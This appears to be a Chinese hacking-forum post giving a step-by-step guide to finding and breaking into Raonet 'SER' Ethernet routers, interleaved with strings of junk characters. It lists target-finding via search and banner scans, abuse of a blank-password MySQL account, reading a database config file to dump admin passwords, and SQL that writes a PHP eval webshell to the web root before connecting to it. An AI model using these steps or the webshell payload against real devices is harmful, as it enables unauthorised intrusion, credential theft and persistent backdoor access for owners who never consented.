寻找存在漏洞的路由器方法:7 M Y8 ~* J8 R" K+ ~9 @
c, o) R/ B) t* _: f M
1:google搜索'Raonet Subscriber Ethernet Router'
7 @. \1 ]9 _, V" T
" }- F" D- D0 E& z* E9 B" r" R2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
# K4 i- q5 u, ]1 q9 B# T- H( N: x" H/ Q! R& J. ]
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
: R1 C& A# q# x/ D7 c0 n
' C/ U! p" B$ x3 w" u* z3 Q//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
v3 u' U5 q, x- W6 i: [9 Y# P# r- \7 `$ l0 _
5 w, l! r& I, B! O7 }
+ g4 f0 K" ]% M% o. K
入侵步骤:
M0 }4 Z* b) h" f# ]/ B; k
( |3 S1 k8 Z, r1 \9 l6 x1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
" R" N7 n9 g( e" n4 w$ n) s- D4 i9 \7 T$ ]% r1 G* d l: z( ~) J. ~
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
, M1 A, r0 w! ]/ c" {# t) E3:得到密码后连接,查看GUI管理密码:
' E; a$ t% m0 m4 Q& W& L; K, Juse ser_5005 s# S8 H! B6 o7 W3 Z; \4 Z) M
select id,passwd from user;
' N+ p% M- s4 G3 |" l' b4:通过数据库写入webshell,执行命令:
3 n/ I3 b; O6 x6 }9 c" Y$ Kuse mysql;3 i% |: A( Y# a, p" B
create table ok(cmd TEXT);: K8 s. y( g- ?( m. b; V5 O5 S
insert into ok values("<?php @eval($_POST[cmd])?>");9 J0 e( P+ Q" d [( u6 f
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
' U. T) D6 F& k# p6 Cdrop table ok;
7 _9 L( M ~7 w: d4 L
- h8 P* |4 M' [7 W6 [+ Z( L5:连接后门shell.php ; T" ]5 n. x+ \& o
. q, z) `2 a5 A+ _; {+ i0 a( Z
6. 搞定!7 q: V0 k4 z' p* M; b. m. p
# F; J- S# g; M H
|